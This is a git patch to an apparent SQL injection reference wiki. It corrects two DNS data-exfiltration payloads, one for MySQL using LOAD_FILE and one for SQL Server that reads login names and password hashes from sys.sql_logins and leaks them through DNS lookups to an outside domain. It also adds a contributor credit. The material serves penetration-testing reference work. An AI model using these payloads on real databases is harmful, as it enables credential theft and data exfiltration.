From e643ac8caa23d24bd295127677df11f3517ce430 Mon Sep 17 00:00:00 2001
From: Ian Williams <aph3rson@gmail.com>
Date: Sat, 20 Oct 2018 13:31:44 -0500
Subject: [PATCH] Fix DNS-related exfiltration issues. (#6)

* Fix MySQL DNS Request

Add missing period.

Works on NetSPI/SQLInjectionWiki#5.

* Fix SQL Server DNS request

Add missing period.

Works on NetSPI/SQLInjectionWiki#5.

* Add contributors entry

https://github.com/NetSPI/SQLInjectionWiki/pull/6#issuecomment-431399072

Works on NetSPI/SQLInjectionWiki#5.
---
 README.md                                     | 1 +
 attackQueries/dataExfiltration/mysql.html     | 2 +-
 attackQueries/dataExfiltration/sqlserver.html | 2 +-
 3 files changed, 3 insertions(+), 2 deletions(-)

diff --git a/README.md b/README.md
index dcbefb1..8db78cc 100644
--- a/README.md
+++ b/README.md
@@ -14,6 +14,7 @@ See [CONTRIBUTING.md](https://github.com/NetSPI/WikiJekyllTheme/blob/master/CONT
 - Ben Tindell
 - Colin Salisbury
 - Eric Gruber (@egru)
+- Ian Williams (@aph3rson)
 - Jake Reynolds (@jreynoldsdev)
 - Khai Tran (@k_tr4n)
 - Rafael Seferyan
diff --git a/attackQueries/dataExfiltration/mysql.html b/attackQueries/dataExfiltration/mysql.html
index b1d832f..8ea22f3 100644
--- a/attackQueries/dataExfiltration/mysql.html
+++ b/attackQueries/dataExfiltration/mysql.html
@@ -13,7 +13,7 @@ <h3 id="data-exfiltration">Data Exfiltration</h3>
 </thead>
 <tbody><tr>
   <td>DNS Request</td>
-  <td>SELECT LOAD_FILE(concat('\\\\',(<strong>QUERY_WITH_ONLY_ONE_ROW</strong>), 'yourhost.com\\'))</td>
+  <td>SELECT LOAD_FILE(concat('\\\\',(<strong>QUERY_WITH_ONLY_ONE_ROW</strong>), '.yourhost.com\\'))</td>
 </tr>
 <tr>
   <td>SMB Share</td>
diff --git a/attackQueries/dataExfiltration/sqlserver.html b/attackQueries/dataExfiltration/sqlserver.html
index 3bad19b..a813cce 100644
--- a/attackQueries/dataExfiltration/sqlserver.html
+++ b/attackQueries/dataExfiltration/sqlserver.html
@@ -13,7 +13,7 @@ <h3 id="data-exfiltration">Data Exfiltration</h3>
   <tbody>
     <tr>
       <td>Make DNS Request</td>
-      <td>DECLARE @host varchar(800);<br>select @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + 'netspi.com' from sys.sql_logins;<br>exec('xp_fileexist "\' + @host + 'c$boot.ini"');</td>
+      <td>DECLARE @host varchar(800);<br>select @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.netspi.com' from sys.sql_logins;<br>exec('xp_fileexist "\' + @host + 'c$boot.ini"');</td>
     </tr>
     <tr>
       <td>UNC Path (DNS Request)</td>